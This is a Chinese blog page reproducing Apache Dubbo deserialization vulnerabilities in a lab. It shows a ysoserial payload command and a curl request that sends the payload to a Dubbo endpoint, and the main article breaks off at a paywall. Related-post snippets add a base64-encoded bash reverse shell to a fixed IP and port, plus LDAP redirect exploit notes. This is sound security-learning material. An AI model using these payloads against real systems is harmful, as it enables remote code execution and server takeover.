Apache Dubbo反序列化漏洞复现分析

最新推荐文章于 2025-10-07 01:19:35 发布

原创

最新推荐文章于 2025-10-07 01:19:35 发布 · 3.2k 阅读

4 ·

CC 4.0 BY-SA版权

文章标签：

#apache #rpc #java

本文详细分析了Apache Dubbo的两个经典反序列化漏洞CVE-2019-17564和CVE-2020-1948，包括影响版本、漏洞环境准备、漏洞分析、补丁分析及修复方法。通过示例展示了漏洞利用链和修复措施，强调了升级到最新版本以避免此类漏洞的重要性。

前言

学习下Apache Dubbo系列的经典漏洞

CVE-2019-17564

0x01 影响版本

Dubbo 2.7.0 to 2.7.4
Dubbo 2.6.0 to 2.6.7
Dubbo all 2.5.x versions

0x02 环境准备

https://github.com/apache/dubbo-samples/tree/master/dubbo-samples-http下载源代码，在pom中切换dubbo版本，发现无法找到存在该漏洞的版本，手动下载jar包添加，并添加可利用依赖common-collections3.2

0x03 漏洞分析

在dubbo开启http协议后通过http协议的请求都会经过

org.apache.dubbo.rpc.protocol.http.HttpProtocol.InternalHandler#handle方法，所以在此处打断点

利用ysoserial生成payload

java -jar ysoserial.jar CommonsCollections6 
"/System/Applications/Calculator.app/Contents/MacOS/Calculator">cc6

然后发送

curl http://127.0.0.1:8081/org.apache.dubbo.samples.http.api.DemoService --data-binary @cc6

会发现断在我们的断点处，向下跟踪

170行会根据我们传入的路径寻找处理器，我们看看this.skeletonMap的值

key对应着请求路径,value是一个HttpInvokerServiceExporter类的实例；接着在177行使用获取到的处理器处理请求，调用的是

org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter#handleRequest

接着会将请求

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

长白山攻防实验室

关注关注

0
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Aapche Dubbo 反序列化漏洞复现(CVE-2019-17564)

0xSec

12-24

1157

Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。

Apache Dubbo 反序列化漏洞(CVE-2020-1948)

m0_46689007的博客

11-29

854

使用marshalsec开启ldap时，如果ldap服务和http服务上有日志，但时恶意命令没有执行，可以将"http://192.168.146.128#exp "改为"http://192.168.146.128/#exp"docker环境执行命令可能需要编码，如果ldap服务和http服务上有日志，但时恶意命令没有执行，将命令编码。看到ldap服务被访问，重定向到我们的http服务上的exp.class类。这一段是被攻击机访问攻击机的http服务上的恶意类exp.class。

参与评论您还未登录，请先登录后发表或查看评论

漏洞复现-Apache Dubbo反序列化漏洞(CVE-2023-23638)

玄道的网安博客

08-11

748

GenericFilter 将根据客户端提供的接口名、方法名、方法参数类型列表，根据反射机制获取对应的方法，再根据客户端提供的反序列化方式将参数进行反序列化成 pojo 对象。遍历 Map 中所有的 key, 并尝试获取与 key 对应的 setter 或 Field, 然后赋值因为上面的过程会同时获取可能的 setter 和 Field, 然后赋值, 所以我们基本上可以控制任何类的任何属性 (即使它没有对应的 setter)1、关闭对公网开放的Dubbo服务端端口，仅允许可信任的IP访问。

Apache Dubbo反序列化漏洞

蚁景网安学院

11-18

1673

Apache Dubbo反序列化漏洞复现及利用！

Dubbo安全漏洞：常见漏洞与修复方案

最新发布

gitblog_00148的博客

10-07

326

在分布式系统开发中，Apache Dubbo（分布式服务框架）的安全问题直接关系到整个微服务架构的稳定性。本文将系统梳理Dubbo常见安全漏洞类型、典型案例（如CVE-2020-1948）的修复方案，并提供漏洞预防的最佳实践，帮助开发团队构建更安全的服务体系。 ## 一、Dubbo安全漏洞概述 ### 1.1 漏洞影响范围根据Dubbo官方安全策略文档[SECURITY.md](https:...

有关Apache dubbo反序列化漏洞的复现及思考

码农小麦

06-07

1107

有关Apache dubbo反序列化漏洞(CVE-2019-17564)网上有许多漏洞复现文章，官方漏洞描述也说的很清楚，开启了http remoting协议时，存在反序列化漏洞。本身有关java的漏洞，反序列化占了很大一部分。大概流程就是应用程序在反序列化时执行了恶意代码导致RCE(remote command/code execute)。先来看一个自定义对象反序列化引发RCE的示例： public class SerialDemo { public static void main(String[

Apache Dubbo 存在反序列化漏洞（CVE-2023-23638）

murphysec的博客

03-09

4672

Apache Dubbo 是一款轻量级 Java RPC 框架该项目受影响版本存在反序列化漏洞，由于Dubbo在序列化时检查不够全面，当攻击者可访问到dubbo服务时，可通过构造恶意请求绕过检查触发反序列化，执行恶意代码

Apache Dubbo(CVE-2019-17564) Java反序列化漏洞复现笔记（最详细版本）

精品博客,你值得一看~

08-25

2127

java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成反弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行。

【反序列化漏洞】关于反序列化漏洞的杂谈1 -- Apache Dubbo 反序列化漏洞 CVE-2023-29234

blackmagic的博客

07-26

1634

反序列化漏洞也被称为"unserialization vulnerability"。它存在于那些允许将对象从字符串或二进制数据转换回原始对象的应用程序中。反序列化漏洞的问题在于，恶意用户可以构造特殊的序列化数据，通过应用程序的反序列化过程来执行恶意代码。这可以导致应用程序在反序列化过程中执行任意的代码，包括读取、修改或删除应用程序的敏感数据，或者在应用程序上下文中执行不受控制的操作。

漏洞预警|Apache Dubbo 存在反序列化漏洞

LJQClqjc的博客

03-09

798

棱镜七彩安全预警

shrio反序列漏洞修复_提醒：Apache Dubbo存在反序列化漏洞

weixin_39583521的博客

12-01

213

背景：近日监测到Apache Dubbo存在反序列化漏洞(CVE-2019-17564)，此漏洞可导致远程代码执行。Apache Dubbo是一款应用广泛的高性能轻量级的Java RPC分布式服务框架。鉴于漏洞危害较大，建议尽快更新软件。情报通告：威胁程度：个人风险评级：低危企业风险评级：中危情报风险预警：对公司影响等级为中，对使用Apache Dubbo相应版本的企业均有被攻击的风险。情报描述：...

Apache Dubbo 高危漏洞

zb_3Dmax的博客

09-06

896

具体是因为 Apache Dubbo hessian-lite 3.2.11 及之前的版本存在反序列化漏洞，而这个 hessina-lite 恰巧就是 Dubbo 默认的序列化方法。其实这个漏洞爆出来已经很多天了，影响面没 Log4j2 大，所以没那么“火”，不过也是个高危漏洞。今天又看到了个 Apache Dubbo 的高危漏洞通告，好家伙一看这版本，我们的应用有漏洞…所以用 Dubbo 的同学快去排查下自己的应用，看看是否受到影响。又是一个可以远程代码执行的漏洞，漏洞的类型是因为反序列化的问题。

反序列化漏洞复现

qq_43679531的博客

01-21

3108

1.进入vulhub中使用docker-compose up -d命令启动jboss环境 2.访问http://192.168.1.31:8080，搭建成功 3.访问http://192.168.1.31:8080/invoker/readonly返回500，说明可能存在漏洞 4.使用命令java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.1.43:4444 生成ser

关于Apache Dubbo反序列化漏洞（CVE-2023-23638）的预警提示与对应的Zookeeper版本

u011236069的博客

06-27

2205

Apache官方发布安全公告，修复了Apache Dubbo中的一个反序列化漏洞（CVE-2023-23638）。由于Apache Dubbo安全检查存在缺陷，导致可以绕过反序列化安全检查并执行反序列化攻击，成功利用该漏洞可在目标系统上执行任意代码。Apache Dubbo 2.7.x 版本：

Apache Dubbo Hession反序列化漏洞（CVE-2022-39198）

huofuman960209的博客

11-07

2490

Apache Dubbo组件存在Hession反序列化漏洞，该漏洞是由于Dubbo hessian-lite 3.2.12及之前版本中存在反序列化漏洞，利用此漏洞可在目标系统上执行恶意代码，最终获取服务器最高权限，漏洞编号：CVE-2022-39198，漏洞威胁等级：高危。

反序列化漏洞及漏洞复现

来日可期的博客

09-05

4756

反序列化漏洞是指应用程序在对已经序列化的数据进行反序列化时，由于缺少必要的验证或过滤，导致恶意数据被成功地反序列化为对象并被执行。攻击者可以构造恶意数据来利用这个漏洞，攻击方式通常是通过网络等传输渠道向目标应用程序发送序列化数据，使得应用程序在反序列化时执行了攻击者所构造的恶意代码，进而导致应用程序受到攻击。

漏洞预警｜Apache Dubbo再现反序列化漏洞，腾讯安全已支持全方位检测防护

wzl_540的专栏

03-15

1598

（2）若直接编译、使用jar包构建项目，可查看jar包版本判断是否可能受漏洞影响（jar包全名：dubbo-x.x.x.jar / dubbo-common-x.x.x.jar，其中dubbo / dubbo-common为包名，x.x.x为版本）。（1）若使用maven构建项目，可在pom.xml等文件中查看引用的maven包版本（maven groupId: org.apache.dubbo，artifactId: dubbo / dubbo-common）。

fastjson（反序列化）漏洞复现

weixin_58954236的博客

09-11

1654

FastJson是Alibaba的一款开源Json解析库，可用于将Java对象转换为其Json表示形式，也可以用于将Json字符串转换为等效的Java对象。近几年来FastJson漏洞层出不穷。RCE漏洞的源头：17年FastJson爆出的1.2.24反序列化漏洞。关于FastJson1.2.24反序列化漏洞，简单来说，就是FastJson通过parseObject/parse将传入的字符串反序列化为Java对象时由于没有进行合理检查而导致的。

Apache Dubbo 被曝出“高危”远程代码执行漏洞

Java后端技术

06-26

943

Apache反序列化漏洞

03-24

### Apache 反序列化漏洞原因及修复方法 #### 一、Apache Shiro 反序列化漏洞分析 Apache Shiro 是一个强大的 Java 安全框架，用于实现身份验证、授权等功能。然而，由于 RememberMe 功能的设计缺陷，可能导致反序列化漏洞的发生。 1. **漏洞成因** - Shiro 的 `RememberMe` 功能允许用户在关闭浏览器后重新打开时保持登录状态。为了实现这一功能，Shiro 对用户的会话信息进行了序列化并存储在 Cookie 中。 - 默认情况下，Shiro 使用 AES 加密算法对这些数据进行加密，并将其转换为 Base64 编码后的字符串保存在客户端的 Cookie 中。 - 然而，默认使用的 AES 密钥是硬编码的，这意味着攻击者可以通过已知的密钥解密和修改 Cookie 数据[^3]。 - 攻击者可以利用此特性伪造恶意对象并通过反序列化过程执行任意代码。 2. **修复方案** - 配置自定义的 AES 密钥以替代默认的硬编码密钥。可以在配置文件中设置如下参数： ```properties cookie.rememberMeManager.cipherKey = 自定义AES密钥 ``` - 如果不需要 `RememberMe` 功能，则可以直接禁用它。通过以下方式禁用： ```java DefaultWebSecurityManager securityManager = new DefaultWebSecurityManager(); securityManager.setRememberMeManager(null); ``` --- #### 二、Apache Dubbo 反序列化漏洞分析 Apache Dubbo 是一款流行的 Java RPC 框架，广泛应用于分布式系统开发中。近期发现的一个严重漏洞（CVE-2020-1948）涉及反序列化的远程代码执行问题。 1. **漏洞成因** - 在 Dubbo 提供的服务端（Provider）中，存在未受保护的对象反序列化逻辑。如果攻击者能够控制输入的数据流，就可能触发反序列化漏洞。 - 特定条件下，攻击者可通过构造恶意请求来执行任意代码。尽管官方发布了修补版本（2.7.7），但后续测试表明该补丁可被绕过[^2]。 2. **修复建议** - 升级至最新稳定版：当前官方尚未完全解决 CVE-2020-1948 补丁绕过的安全隐患，因此应密切关注更新动态并及时升级到最新的安全版本。 - 启用白名单机制：限制只接受来自可信源的请求，从而减少潜在威胁的影响范围。 - 替代高危组件：考虑替换掉基于 JDK 序列化的模块，改用更安全的序列化库（如 Kryo 或 Protobuf）。例如： ```xml <dependency> <groupId>com.esotericsoftware</groupId> <artifactId>kryo</artifactId> <version>5.3.0</version> </dependency> ``` --- #### 三、通用防御策略无论是针对 Shiro 还是 Dubbo 的反序列化漏洞，都可以采用一些通用的安全实践降低风险： 1. **避免使用不安全的序列化协议** 尽量选用经过严格审查且具备良好安全性保障的第三方序列化工具代替原生 JDK 实现。 2. **实施严格的输入校验** 所有外部传入的数据都需经过细致过滤与合法性判断后再参与业务流程处理。 3. **启用 WAF 和防火墙防护** Web 应用程序防火墙 (WAF) 能够识别异常流量模式并对可疑行为发出警告甚至阻断连接尝试；同时部署边界网络设备进一步增强整体架构韧性。 4. **定期审计代码质量** 利用静态分析工具扫描项目中的薄弱环节，并结合人工复查确保覆盖全面无遗漏之处。 --- ### 结论综上所述，Apache Shiro 和 Dubbo 的反序列化漏洞均源于设计上的不足以及缺乏充分的输入验证措施所致。遵循上述指导方针有助于显著提升系统的抗攻击能力水平。